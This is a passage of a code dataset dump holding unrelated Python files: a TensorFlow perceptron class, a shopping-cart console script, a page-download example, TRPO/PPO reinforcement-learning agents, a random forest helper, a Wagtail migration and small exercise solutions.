)\r\n\r\n # 重みの Variable\r\n weight_var = tf.Variable( init_tsr )\r\n \r\n return weight_var\r\n\r\n\r\n def init_bias_variable( self, input_shape ):\r\n \"\"\"\r\n バイアス項 b の初期化を行う。\r\n バイアス項は TensorFlow の Variable で定義することで、\r\n 学習過程(最適化アルゴリズム Optimizer の session.run(...))で自動的に TensorFlow により、変更される値となる。\r\n\r\n [Input]\r\n input_shape : [int,int]\r\n バイアス項の Variable を初期化するための Tensor の形状\r\n\r\n [Output]\r\n ゼロ初期化された重みの Variable \r\n session.run(...) はされていない状態。\r\n \"\"\"\r\n\r\n #init_tsr = tf.zeros( shape = input_shape )\r\n init_tsr = tf.random_normal( shape = input_shape )\r\n\r\n # バイアス項の Variable\r\n bias_var = tf.Variable( init_tsr )\r\n\r\n return bias_var\r\n\r\n\r\n def model( self ):\r\n \"\"\"\r\n モデルの定義(計算グラフの構築)を行い、\r\n 最終的なモデルの出力のオペレーターを設定する。\r\n\r\n [Output]\r\n self._y_out_op : Operator\r\n モデルの出力のオペレーター\r\n \"\"\"\r\n # 計算グラフの構築\r\n #print( \"len( _n_hiddenLayers ) : \", len( self._n_hiddenLayers ) )\r\n #print( \"len( [_n_hiddenLayers] ) : \", len( [self._n_hiddenLayers] ) )\r\n #print( \"_n_hiddenLayers\", self._n_hiddenLayers.shape )\r\n #print( \"_n_hiddenLayers\", self._n_hiddenLayers.shape[0] )\r\n\r\n #--------------------------------------------------------------\r\n # 隠れ層が1つのみの場合\r\n #--------------------------------------------------------------\r\n if ( len( self._n_hiddenLayers ) == 1 ):\r\n # 入力層 ~ 隠れ層\r\n self._weights.append( self.init_weight_variable( input_shape = [self._n_inputLayer, self._n_hiddenLayers[0] ] ) )\r\n self._biases.append( self.init_bias_variable( input_shape = [self._n_hiddenLayers[0]] ) )\r\n\r\n # 隠れ層への入力 : h_in = W*x + b\r\n h_in_op = tf.matmul( self._X_holder, self._weights[0] ) + self._biases[0]\r\n \r\n # 隠れ層からの出力\r\n h_out_op = self._activate_hiddenLayer.activate( h_in_op )\r\n #h_out_op = tf.nn.sigmoid( h_in_op )\r\n #print( \"activate function [hidden layer] = sigmoid\" )\r\n\r\n # 隠れ層 ~ 出力層\r\n self._weights.append( self.init_weight_variable( input_shape = [self._n_hiddenLayers[0], self._n_outputLayer] ) )\r\n self._biases.append( self.init_bias_variable( input_shape = [self._n_outputLayer] ) )\r\n \r\n #--------------------------------------------------------------\r\n # 隠れ層が複数個ある場合\r\n #--------------------------------------------------------------\r\n else:\r\n # i=0 : 入力層 ~ 隠れ層\r\n # i=1,2... : 隠れ層 ~ 隠れ層\r\n for (i, n_hidden) in enumerate( self._n_hiddenLayers ):\r\n # 入力層 ~ 隠れ層\r\n if (i==0):\r\n input_dim = self._n_inputLayer\r\n input_holder = self._X_holder\r\n\r\n # 隠れ層 ~ 隠れ層\r\n else:\r\n input_dim = self._n_hiddenLayers[i-1]\r\n input_holder = h_out_op\r\n\r\n # 重みの Variable の list に、入力層 ~ 隠れ層 or 隠れ層 ~ 隠れ層の重みを追加\r\n self._weights.append( self.init_weight_variable( input_shape = [input_dim, n_hidden] ) )\r\n\r\n # バイアス項の Variable の list に、入力層 ~ 隠れ層 or 隠れ層 ~ 隠れ層のバイアス項を追加\r\n self._biases.append( self.init_bias_variable( input_shape = [n_hidden] ) )\r\n\r\n # 隠れ層への入�� : h_in = W*x + b\r\n h_in_op = tf.matmul( input_holder, self._weights[-1] ) + self._biases[-1]\r\n\r\n # 隠れ層からの出力\r\n h_out_op = self._activate_hiddenLayer.activate( h_in_op )\r\n #h_out_op = tf.nn.sigmoid( h_in_op )\r\n #print( \"activate function [hidden layer] = sigmoid\" )\r\n #h_out_op = tf.nn.relu( h_in_op )\r\n #print( \"activate function [hidden layer] = Relu\" )\r\n\r\n # ドロップアウト処理\r\n #output_holder = tf.nn.dropout( h_out_op, self._keep_prob_holder )\r\n #output_holder = h_out_op\r\n \r\n # 隠れ層 ~ 出力層\r\n self._weights.append( self.init_weight_variable( input_shape = [self._n_hiddenLayers[-1], self._n_outputLayer] ) )\r\n self._biases.append( self.init_bias_variable( input_shape = [self._n_outputLayer] ) )\r\n\r\n\r\n #--------------------------------------------------------------\r\n # 出力層への入力\r\n #--------------------------------------------------------------\r\n y_in_op = tf.matmul( h_out_op, self._weights[-1] ) + self._biases[-1]\r\n\r\n #--------------------------------------------------------------\r\n # モデルの出力\r\n #--------------------------------------------------------------\r\n self._y_out_op = self._activate_outputLayer.activate( y_in_op )\r\n \r\n # 2分類問題の場合\r\n # sigmoid\r\n #self._y_out_op = tf.nn.sigmoid( y_in_op )\r\n #print( \"activate function [output layer] = sigmoid\" )\r\n \r\n # Relu\r\n #self._y_out_op = tf.nn.relu( y_in_op )\r\n #print( \"activate function [output layer] = Relu\" )\r\n\r\n # 多分類問題の場合\r\n # softmax\r\n #self._y_out_op = tf.nn.softmax( y_in_op )\r\n #print( \"activate function [output layer] = softmax\" )\r\n\r\n return self._y_out_op\r\n\r\n \r\n def loss( self, nnLoss ):\r\n \"\"\"\r\n 損失関数の定義を行う。\r\n \r\n [Input]\r\n nnLoss : NNLoss クラスのオブジェクト\r\n \r\n [Output]\r\n self._loss_op : Operator\r\n 損失関数を表すオペレーター\r\n \"\"\"\r\n self._loss_op = nnLoss.loss( t_holder = self._t_holder, y_out_op = self._y_out_op )\r\n \r\n return self._loss_op\r\n\r\n\r\n def optimizer( self, nnOptimizer ):\r\n \"\"\"\r\n モデルの最適化アルゴリズムの設定を行う。\r\n [Input]\r\n nnOptimizer : NNOptimizer のクラスのオブジェクト\r\n\r\n [Output]\r\n optimizer の train_step\r\n \"\"\"\r\n self._optimizer = nnOptimizer._optimizer\r\n self._train_step = nnOptimizer.train_step( self._loss_op )\r\n \r\n return self._train_step\r\n\r\n\r\n def fit( self, X_train, y_train ):\r\n \"\"\"\r\n 指定されたトレーニングデータで、モデルの fitting 処理を行う。\r\n\r\n [Input]\r\n X_train : numpy.ndarray ( shape = [n_samples, n_features] )\r\n トレーニングデータ(特徴行列)\r\n \r\n y_train : numpy.ndarray ( shape = [n_samples] )\r\n トレーニングデータ用のクラスラベル(教師データ)のリスト\r\n\r\n [Output]\r\n self : 自身のオブジェクト\r\n \"\"\"\r\n # TensorFlow 用にデータを reshape\r\n #y_train.reshape( [len(y_train), 1] )\r\n\r\n #----------------------------\r\n # 学習開始処理\r\n #----------------------------\r\n # Variable の初期化オペレーター\r\n self._init_var_op = tf.global_variables_initializer()\r\n\r\n # Session の run(初期化オペレーター)\r\n self._session.run( self._init_var_op )\r\n \r\n #print( \"init_weights\", self._session.run( self._weights ) )\r\n\r\n #-------------------\r\n # 学習処理\r\n #-------------------\r\n n_batches = len( X_train ) // self._batch_size # バッチ処理の回数\r\n\r\n # for ループでエポック数分トレーニング\r\n for epoch in range( self._epochs ):\r\n # ミニバッチ学習処理のためランダムサンプリング\r\n X_train_shuffled, y_train_shuffled = shuffle( X_train, y_train )\r\n \r\n # 2クラス分類の場合\r\n if (self._n_outputLayer == 1):\r\n # shape を placeholder の形状に合わせるためにするため [...] で囲み、transpose() する。\r\n # shape を (n_samples, → (n_samples,1) に reshape\r\n y_train_shuffled = numpy.transpose( [ y_train_shuffled ] )\r\n \r\n for i in range( n_batches ):\r\n it_start = i * self._batch_size\r\n it_end = it_start + self._batch_size\r\n\r\n self._session.run(\r\n self._train_step,\r\n feed_dict = {\r\n self._X_holder: X_train_shuffled[it_start:it_end],\r\n self._t_holder: y_train_shuffled[it_start:it_end]\r\n }\r\n )\r\n\r\n # 損失関数の値をストック\r\n # 2クラス分類の場合\r\n if (self._n_outputLayer == 1):\r\n # shape を (n_samples, → (n_samples,1) に reshape\r\n loss = self._loss_op.eval(\r\n session = self._session,\r\n feed_dict = {\r\n self._X_holder: X_train,\r\n self._t_holder: numpy.transpose( [ y_train ] )\r\n }\r\n )\r\n # 多クラス分類の場合\r\n else:\r\n loss = self._loss_op.eval(\r\n session = self._session,\r\n feed_dict = {\r\n self._X_holder: X_train,\r\n self._t_holder: y_train\r\n }\r\n )\r\n\r\n self._losses_train.append( loss )\r\n\r\n return self._y_out_op\r\n\r\n\r\n def predict( self, X_test ):\r\n \"\"\"\r\n fitting 処理したモデルで、推定を行い、予想クラスラベル値を返す。\r\n\r\n [Input]\r\n X_test : numpy.ndarry ( shape = [n_samples, n_features] )\r\n 予想したい特徴行列\r\n\r\n [Output]\r\n results : numpy.ndarry ( shape = [n_samples] )\r\n 予想結果(分類モデルの場合は、クラスラベル)\r\n \"\"\"\r\n # 出力層の活性化関数が sigmoid のとき(2クラスの識別)\r\n if ( self._activate_outputLayer._node_name == \"Activate_Sigmoid_op\" ):\r\n predict_op = tf.to_int64( tf.greater( self._y_out_op, 0.5 ) )\r\n # 出力層の活性化関数が softmax のとき(多クラスの識別)\r\n elif ( self._activate_outputLayer._node_name == \"Activate_Softmax_op\" ):\r\n predict_op = tf.arg_max( input = self._y_out_op, dimension = 1 )\r\n else:\r\n predict_op = tf.to_int64( tf.greater( self._y_out_op, 0.5 ) )\r\n\r\n predict = predict_op.eval( \r\n session = self._session,\r\n feed_dict = {\r\n self._X_holder: X_test\r\n }\r\n )\r\n \r\n \r\n return predict\r\n\r\n\r\n def predict_proba( self, X_test ):\r\n \"\"\"\r\n fitting 処理したモデルで、推定を行い、クラスの所属確率の予想値を返す。\r\n proba : probability\r\n\r\n [Input]\r\n X_test : numpy.ndarry ( shape = [n_samples, n_features] )\r\n 予想したい特徴行列\r\n \"\"\"\r\n prob = self._y_out_op.eval(\r\n session = self._session,\r\n feed_dict = {\r\n self._X_holder: X_test \r\n }\r\n )\r\n\r\n # X_test のデータ数、特徴数に応じて reshape\r\n #prob = prob.reshape( (len[X_test], len[X_test[0]]) )\r\n\r\n return prob\r\n\r\n\r\n def accuracy( self, X_test, y_test):\r\n \"\"\"\r\n 指定したデータでの正解率 [accuracy] を計算する。\r\n \"\"\"\r\n # 出力層の活性化関数が sigmoid のとき(2クラスの識別)\r\n if ( self._activate_outputLayer._node_name == \"Activate_Sigmoid_op\" ):\r\n correct_predict_op = tf.equal( \r\n tf.to_float( tf.greater( self._y_out_op, 0.5 ) ), \r\n self._t_holder \r\n )\r\n # 出力層の活性化関数が softmax のとき(多クラスの識別)\r\n elif ( self._activate_outputLayer._node_name == \"Activate_Softmax_op\" ):\r\n correct_predict_op = tf.equal(\r\n tf.arg_max( self._y_out_op, dimension = 1 ),\r\n tf.arg_max( self._t_holder, dimension = 1 )\r\n )\r\n else:\r\n correct_predict_op = tf.equal( \r\n tf.to_float( tf.greater( self._y_out_op, 0.5 ) ), \r\n self._t_holder \r\n )\r\n\r\n # correct_predict_op は、feed_dict で与えるデータ分(全データ)の結果(合っていた数)を返すので、\r\n # tf.reduce_mean(..) でその平均値を計算すれば、合っていた数 / 全データ数 = 正解率 が求まる。\r\n accuracy_op = tf.reduce_mean( tf.cast( correct_predict_op, tf.float32 ) )\r\n \r\n # 2クラス分類の場合\r\n if (self._n_outputLayer == 1):\r\n # shape を (n_samples, → (n_samples,1) に reshape\r\n y_test = numpy.transpose( [ y_test ] )\r\n\r\n accuracy = accuracy_op.eval(\r\n session = self._session,\r\n feed_dict = {\r\n self._X_holder: X_test,\r\n self._t_holder: y_test\r\n } \r\n )\r\n\r\n return accuracy\r\n","sub_path":"MultilayerPerceptron_TensorFlow/MultilayerPerceptron.py","file_name":"MultilayerPerceptron.py","file_ext":"py","file_size_in_byte":21942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"316235504","text":"# 定义仓库\nrepository = dict()\n# 定义购物清单对象\n# mock shop_list = [('10001', 4)]\nshop_list = []\n\n# 初始化商品\ndef init_repo():\n goods1 = (\"10001\", \"馒头\", 88.0)\n goods2 = (\"10002\", \"花卷\", 68.0)\n goods3 = ('10003', \"包子\", 87)\n goods4 = ('10004', '牛腩', 39)\n goods5 = ('10005', '鸡蛋', 13)\n goods6 = ('10006', '米饭', 50)\n # 入库 ,条码做key\n repository[goods1[0]] = goods1\n repository[goods2[0]] = goods2\n repository[goods3[0]] = goods3\n repository[goods4[0]] = goods4\n repository[goods5[0]] = goods5\n repository[goods6[0]] = goods6\n\n\ndef show_goods():\n print('\\n')\n print('♡'*32 + ' 欢迎光临馒头便利店 '+'♡'*32+'\\n')\n print('馒头便利店的商品清单:')\n print('%13s%40s%10s' % ('条码', '商品名称', '单价'))\n # 遍历所有list列表\n for goods in repository.values():\n print('%15s%40s%13s' % goods)\n\n\ndef show_list():\n print('=' * 100)\n if not shop_list:\n print('购物车为空')\n else:\n title = \"%-5s|%15s|%40s|%10s|%4s|%10s\" % \\\n ('ID', '条码', '商品名称', '单价', '数量', '小计')\n print(title)\n print('-'*100)\n # 计算总价价格\n sum = 0\n for i, item in enumerate(shop_list):\n # 转换商品id为索引+1\n id = i + 1\n # 获取该购物明细的第一个元素:商品条码\n code = '10001'\n # repository[条码,key值][元组序号] 对应key的元组的内容\n # 获取商品名和单价\n name = repository[code][1]\n price = repository[code][2]\n # 获取要购买的数量\n number = item[1]\n amount = number * price\n # 总计\n sum = sum + amount\n # line\n line = \"%-5s|%17s|%41s|%12s|%6s|%12s\" % \\\n (id, code, name, price, number, amount)\n print(line)\n print('-'*100)\n print(\" 总计\", sum)\n print('='*100)\n\n\ndef add():\n # 输入条码\n code = input('请输入条码:\\n')\n if code not in repository:\n print(\"条码不存在\")\n return\n # 根据条码查找商品\n # goods = repository[code]\n # 等待输入数量\n number = input(\"请输入购买数量:\\n\")\n shop_list.append([code, int(number)])\n\n\ndef edit():\n id = input('请输入编辑商品的id')\n index = int(id) - 1\n item = shop_list[index] # python列表复制均为引用,故复制后的改变原有的也改变\n print(shop_list)\n number = input('请输入新的数量: \\n')\n item[1] = int(number)\n\n\ndef delete():\n id = input('请输入要删除的id')\n index = id - 1\n item = shop_list[index]\n print(shop_list)\n del shop_list[index]\n\n\ndef payment():\n # 先打印清单\n show_list()\n print('\\n'*3)\n print('欢迎下次光临')\n import os\n os._exit(0)\n\n\ncmd_dict = {'a': add, 'e': edit, 'd': delete, 'p': payment, 's': show_goods}\n\n\ndef show_conmmand():\n cmd = input('请输入操作指令:\\n' +\n \"添加(a) 修改(e) 删除(d) 结算(p) 超市商品(s) \\n\")\n if cmd not in cmd_dict:\n print('wrong')\n else:\n cmd_dict[cmd]()\n\n\ninit_repo()\nshow_goods()\n\nwhile True:\n # 为了能循环进行,使用while\n show_list()\n show_conmmand()\n\n\n# init_repo()\n# show_goods()\n# show_list()\n# add()\n# show_list()\n# edit()\n# show_list()\n# # show_goods()\n# # print(repository['10001'])\n\n\n","sub_path":"crazy_python/chapter4/supermarket.py","file_name":"supermarket.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"232147425","text":"import urllib.request as req\n\n# google.com 메인 페이지 소스 다운로드\nurl = \"https://www.google.com/\"\n\n# 다운로드 받을 파일 지정\nsave_url = \"d:/google.html\"\n\ntry:\n file1, header1 = req.urlretrieve(url, save_url)\nexcept Exception as e:\n print(e)\nelse:\n print(header1) # HTTPMessage\n print(\"성공\")\n","sub_path":"urllib/urlretrieve1.py","file_name":"urlretrieve1.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"569765975","text":"import numpy as np\nfrom tqdm import tqdm\n\nimport torch\nimport torch.nn.functional as F\n\nfrom mushroom.algorithms.agent import Agent\nfrom mushroom.approximators import Regressor\nfrom mushroom.approximators.parametric import TorchApproximator\nfrom mushroom.utils.torch import get_gradient, zero_grad\nfrom mushroom.utils.minibatches import minibatch_generator\nfrom mushroom.utils.dataset import parse_dataset, compute_J\n\n\ndef compute_gae(V, s, ss, r, absorbing, last, gamma, lam):\n v = V(s)\n v_next = V(ss)\n gen_adv = np.empty_like(v)\n for rev_k, _ in enumerate(reversed(v)):\n k = len(v) - rev_k - 1\n if last[k] or rev_k == 0:\n gen_adv[k] = r[k] - v[k]\n if not absorbing[k]:\n gen_adv[k] += gamma * v_next[k]\n else:\n gen_adv[k] = r[k] + gamma * v_next[k] - v[k] + gamma * lam * gen_adv[k + 1]\n return gen_adv + v, gen_adv\n\n\nclass TRPO(Agent):\n def __init__(self, mdp_info, policy, critic_params,\n ent_coeff=0., max_kl=.001, lam=1.,\n n_epochs_line_search=10, n_epochs_cg=10,\n cg_damping=1e-2, cg_residual_tol=1e-10, quiet=True,\n critic_fit_params=None):\n \"\"\"\n Constructor.\n\n Args:\n\n\n \"\"\"\n self._critic_fit_params = dict(n_epochs=3) if critic_fit_params is None else critic_fit_params\n\n self._n_epochs_line_search = n_epochs_line_search\n self._n_epochs_cg = n_epochs_cg\n self._cg_damping = cg_damping\n self._cg_residual_tol = cg_residual_tol\n\n self._max_kl = max_kl\n self._ent_coeff = ent_coeff\n\n self._lambda = lam\n\n self._V = Regressor(TorchApproximator, **critic_params)\n\n self._iter = 1\n self._quiet = quiet\n\n super().__init__(policy, mdp_info, None)\n\n def fit(self, dataset):\n if not self._quiet:\n tqdm.write('Iteration ' + str(self._iter))\n\n state, action, reward, next_state, absorbing, last = parse_dataset(dataset)\n x = state.astype(np.float32)\n u = action.astype(np.float32)\n r = reward.astype(np.float32)\n xn = next_state.astype(np.float32)\n\n obs = torch.tensor(x, dtype=torch.float)\n act = torch.tensor(u, dtype=torch.float)\n v_target, np_adv = compute_gae(self._V, x, xn, r, absorbing, last,\n self.mdp_info.gamma, self._lambda)\n np_adv = (np_adv - np.mean(np_adv)) / (np.std(np_adv) + 1e-8)\n adv = torch.tensor(np_adv, dtype=torch.float)\n\n # Policy update\n old_pol_dist = self.policy.distribution_t(obs)\n old_log_prob = self.policy.log_prob_t(obs, act).detach()\n\n self._zero_grad()\n loss = self._compute_loss(obs, act, adv, old_log_prob)\n\n prev_loss = loss.item()\n\n # Compute Gradient\n loss.backward(retain_graph=True)\n g = get_gradient(self.policy.parameters())\n\n # Compute direction trough conjugate gradient\n stepdir = self._conjugate_gradient(g, obs, old_pol_dist)\n\n # Line search\n shs = .5 * stepdir.dot(self._fisher_vector_product(\n torch.from_numpy(stepdir), obs, old_pol_dist)\n )\n lm = np.sqrt(shs / self._max_kl)\n fullstep = stepdir / lm\n stepsize = 1.\n\n theta_old = self.policy.get_weights()\n\n violation = True\n\n for _ in range(self._n_epochs_line_search):\n theta_new = theta_old + fullstep * stepsize\n self.policy.set_weights(theta_new)\n\n new_loss = self._compute_loss(obs, act, adv, old_log_prob)\n kl = self._compute_kl(obs, old_pol_dist)\n improve = new_loss - prev_loss\n if kl <= self._max_kl * 1.5 or improve >= 0:\n violation = False\n break\n stepsize *= .5\n\n if violation:\n self.policy.set_weights(theta_old)\n\n # VF update\n self._V.fit(x, v_target, **self._critic_fit_params)\n\n # Print fit information\n self._print_fit_info(dataset, x, v_target, old_pol_dist)\n self._iter += 1\n\n def _zero_grad(self):\n zero_grad(self.policy.parameters())\n\n def _conjugate_gradient(self, b, obs, old_pol_dist):\n p = b.detach().numpy()\n r = b.detach().numpy()\n x = np.zeros_like(b)\n rdotr = r.dot(r)\n\n for i in range(self._n_epochs_cg):\n z = self._fisher_vector_product(\n torch.from_numpy(p), obs, old_pol_dist).detach().numpy()\n v = rdotr / p.dot(z)\n x += v * p\n r -= v * z\n newrdotr = r.dot(r)\n mu = newrdotr / rdotr\n p = r + mu * p\n\n rdotr = newrdotr\n if rdotr < self._cg_residual_tol:\n break\n return x\n\n def _fisher_vector_product(self, p, obs, old_pol_dist):\n self._zero_grad()\n kl = self._compute_kl(obs, old_pol_dist)\n grads = torch.autograd.grad(kl, self.policy.parameters(),\n create_graph=True, retain_graph=True)\n flat_grad_kl = torch.cat([grad.view(-1) for grad in grads])\n\n kl_v = (flat_grad_kl * torch.autograd.Variable(p)).sum()\n grads = torch.autograd.grad(kl_v, self.policy.parameters(),\n retain_graph=True)\n flat_grad_grad_kl = torch.cat(\n [grad.contiguous().view(-1) for grad in grads]).data\n\n return flat_grad_grad_kl + p * self._cg_damping\n\n def _compute_kl(self, obs, old_pol_dist):\n new_pol_dist = self.policy.distribution_t(obs)\n return torch.mean(torch.distributions.kl.kl_divergence(new_pol_dist,\n old_pol_dist))\n\n def _compute_loss(self, obs, act, adv, old_log_prob):\n ratio = torch.exp(self.policy.log_prob_t(obs, act) - old_log_prob)\n J = torch.mean(ratio * adv)\n\n return J + self._ent_coeff * self.policy.entropy_t(obs)\n\n def _print_fit_info(self, dataset, x, v_target, old_pol_dist):\n if not self._quiet:\n logging_verr = []\n torch_v_targets = torch.tensor(v_target, dtype=torch.float)\n for idx in range(len(self._V)):\n v_pred = torch.tensor(self._V(x, idx=idx), dtype=torch.float)\n v_err = F.mse_loss(v_pred, torch_v_targets)\n logging_verr.append(v_err.item())\n\n logging_ent = self.policy.entropy(x)\n new_pol_dist = self.policy.distribution(x)\n logging_kl = torch.mean(\n torch.distributions.kl.kl_divergence(new_pol_dist, old_pol_dist)\n )\n avg_rwd = np.mean(compute_J(dataset))\n tqdm.write(\"Iterations Results:\\n\\trewards {} vf_loss {}\\n\\tentropy {} kl {}\".format(\n avg_rwd, logging_verr, logging_ent, logging_kl))\n tqdm.write(\n '--------------------------------------------------------------------------------------------------')\n\n\nclass PPO(Agent):\n def __init__(self, mdp_info, policy, critic_params, actor_optimizer,\n n_epochs_policy, batch_size, eps_ppo, lam, quiet=True,\n critic_fit_params=None):\n self._critic_fit_params = dict(n_epochs=10) if critic_fit_params is None else critic_fit_params\n\n self._n_epochs_policy = n_epochs_policy\n self._batch_size = batch_size\n self._eps_ppo = eps_ppo\n\n self._optimizer = actor_optimizer['class'](policy.parameters(), **actor_optimizer['params'])\n\n self._lambda = lam\n\n self._V = Regressor(TorchApproximator, **critic_params)\n\n self._quiet = quiet\n self._iter = 1\n\n super().__init__(policy, mdp_info, None)\n\n def fit(self, dataset):\n if not self._quiet:\n tqdm.write('Iteration ' + str(self._iter))\n\n x, u, r, xn, absorbing, last = parse_dataset(dataset)\n x = x.astype(np.float32)\n u = u.astype(np.float32)\n r = r.astype(np.float32)\n xn = xn.astype(np.float32)\n\n obs = torch.tensor(x, dtype=torch.float)\n act = torch.tensor(u, dtype=torch.float)\n v_target, np_adv = compute_gae(self._V, x, xn, r, absorbing, last, self.mdp_info.gamma, self._lambda)\n np_adv = (np_adv - np.mean(np_adv)) / (np.std(np_adv) + 1e-8)\n adv = torch.tensor(np_adv, dtype=torch.float)\n\n old_pol_dist = self.policy.distribution_t(obs)\n old_log_p = old_pol_dist.log_prob(act)[:, None].detach()\n\n self._V.fit(x, v_target, **self._critic_fit_params)\n\n self._update_policy(obs, act, adv, old_log_p)\n\n # Print fit information\n self._print_fit_info(dataset, x, v_target, old_pol_dist)\n self._iter += 1\n\n def _update_policy(self, obs, act, adv, old_log_p):\n for epoch in range(self._n_epochs_policy):\n for obs_i, act_i, adv_i, old_log_p_i in minibatch_generator(\n self._batch_size, obs, act, adv, old_log_p):\n self._optimizer.zero_grad()\n prob_ratio = torch.exp(\n self.policy.log_prob_t(obs_i, act_i) - old_log_p_i\n )\n clipped_ratio = torch.clamp(prob_ratio, 1 - self._eps_ppo,\n 1 + self._eps_ppo)\n loss = -torch.mean(torch.min(prob_ratio * adv_i,\n clipped_ratio * adv_i))\n loss.backward()\n self._optimizer.step()\n\n def _print_fit_info(self, dataset, x, v_target, old_pol_dist):\n if not self._quiet:\n logging_verr = []\n torch_v_targets = torch.tensor(v_target, dtype=torch.float)\n for idx in range(len(self._V)):\n v_pred = torch.tensor(self._V(x, idx=idx), dtype=torch.float)\n v_err = F.mse_loss(v_pred, torch_v_targets)\n logging_verr.append(v_err.item())\n\n logging_ent = self.policy.entropy(x)\n new_pol_dist = self.policy.distribution(x)\n logging_kl = torch.mean(torch.distributions.kl.kl_divergence(\n new_pol_dist, old_pol_dist))\n avg_rwd = np.mean(compute_J(dataset))\n tqdm.write(\"Iterations Results:\\n\\trewards {} vf_loss {}\\n\\tentropy {} kl {}\".format(\n avg_rwd, logging_verr, logging_ent, logging_kl))\n tqdm.write(\n '--------------------------------------------------------------------------------------------------')\n","sub_path":"mushroom/algorithms/actor_critic/trust_region.py","file_name":"trust_region.py","file_ext":"py","file_size_in_byte":10504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"261452813","text":"from parser import *\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import metrics\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import GridSearchCV\n\n# tuned using GridSearchCV\ndef tune_random_forest(train_d, test_d, params):\n\n Xtr = getData(train_d)\n ytr = getLabels(train_d)\n Xte = getData(test_d)\n yte = getLabels(test_d)\n\n rf = RandomForestClassifier()\n clf = GridSearchCV(rf, params)\n clf.fit(Xtr, ytr)\n pred = clf.predict(Xte)\n print(f'tuned: {metrics.accuracy_score(yte, pred)}')\n\n return pred\n\n\ndef run_random_forest(train_d, test_d, n_estimators=100):\n Xtr = getData(train_d)\n ytr = getLabels(train_d)\n Xte = getData(test_d)\n yte = getLabels(test_d)\n\n Xtr, Xte_ex, ytr, yte_ex = train_test_split(Xtr, ytr, test_size=0.5, random_state=42)\n\n\n # n_estimators is number of trees\n rand_forest = RandomForestClassifier(n_estimators=n_estimators)\n rand_forest.fit(Xtr, ytr)\n pred = rand_forest.predict(Xte_ex)\n print(f'split test set accuracy: {metrics.accuracy_score(yte_ex, pred)}')\n\n pred = rand_forest.predict(Xte)\n print(f'test set accuracy: {metrics.accuracy_score(yte, pred)}')\n\n return pred\n","sub_path":"random_forest.py","file_name":"random_forest.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"341420135","text":"import sys\nimport json\nimport matplotlib.pyplot as plt\n\ndef plot_hole(hole):\n xs, ys = zip(*hole)\n xs = list(xs)\n ys = list(ys)\n xs.append(xs[0])\n ys.append(ys[0])\n plt.plot(xs,ys,c='b')\n\ndef plot_figure(edges, vertices):\n for edge in edges:\n a = vertices[edge[0]]\n b = vertices[edge[1]]\n xs, ys = zip(a,b)\n plt.plot(xs, ys,c='r')\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 3:\n print(\"display_solution.py \")\n exit(1)\n\n problem = json.load(open(sys.argv[1]))\n solution = json.load(open(sys.argv[2]))\n plot_hole(problem[\"hole\"])\n plot_figure(problem[\"figure\"][\"edges\"], solution[\"vertices\"])\n plt.show()\n\n","sub_path":"display_solution.py","file_name":"display_solution.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"546164061","text":"def pal(num=3):\n result=[]\n largest=0\n for i in range(10**(num-1),10**num):\n for j in range(i,10**num):\n m=j*i\n if str(m)==str(m)[::-1] and m>largest:\n largest=i*j\n i_=i\n j_=j\n result.append(m)\n return largest,i_,j_\n\nprint(pal())\n","sub_path":"problems/p4.py","file_name":"p4.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"396299612","text":"# -*- coding: utf-8 -*-\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n (\"wagtailsearch\", \"0002_add_verbose_names\"),\n ]\n\n operations = [\n # EditorsPicks have been moved to the \"wagtailsearchpromotions\" module.\n # Remove EditorsPick from wagtailsearch but don't drop the underlying table\n # so wagtailsearchpromotions can pick it up in its initial migration.\n # If wagtailsearchpromotions isn't installed, this table will remain\n # in the database unmanaged until it is. This could potentially happen\n # at any point in the future so it's important to keep this behaviour\n # even if we decide to squash these migrations.\n migrations.SeparateDatabaseAndState(\n state_operations=[\n migrations.RemoveField(\n model_name=\"editorspick\",\n name=\"page\",\n ),\n migrations.RemoveField(\n model_name=\"editorspick\",\n name=\"query\",\n ),\n migrations.DeleteModel(\n name=\"EditorsPick\",\n ),\n ],\n database_operations=[],\n )\n ]\n","sub_path":"wagtail/search/migrations/0003_remove_editors_pick.py","file_name":"0003_remove_editors_pick.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"297487632","text":"#\n# Length of Last Word\n# https://leetcode.com/problems/length-of-last-word/\n#\n# Return the length of the last word in a space separated string\n#\n\n\n# Finds first valid word from end, return 0 if word DNE\ndef length_last_word(s):\n words = reversed(s.split(\" \"))\n return next((len(w) for w in words if len(w) > 0), 0)\n\n\n# Better solution using two pointers\ndef length_last_word_ptrs(s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n l,r = len(s)-1,len(s)-1\n while r>=0 and s[r]==' ':\n r -= 1\n l = r\n while l>=0 and s[l]!=' ':\n l -= 1\n return r-l\n\n\n# Demonstration\ndef main():\n\n s = \"This is a sentence\"\n print(s, \"\\nLength of last word:\", length_last_word(s))\n\nmain()\n","sub_path":"length_last_word.py","file_name":"length_last_word.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"209261764","text":"import json\n\nfrom tests import client\nfrom tests.requests.payments_requests import get_all_payments, get_particular_payment, add_payment, change_payment, \\\n delete_payment\nfrom tests.requests.contracts_requests import get_all_contracts, delete_contract\n\n\ndef test_get_all_payments(client):\n rv = get_all_payments(client)\n assert bytes('15', encoding='utf-8') in rv.data\n\n\ndef test_get_particular_payment(client):\n rv = get_all_payments(client)\n rs = json.loads(rv.data, 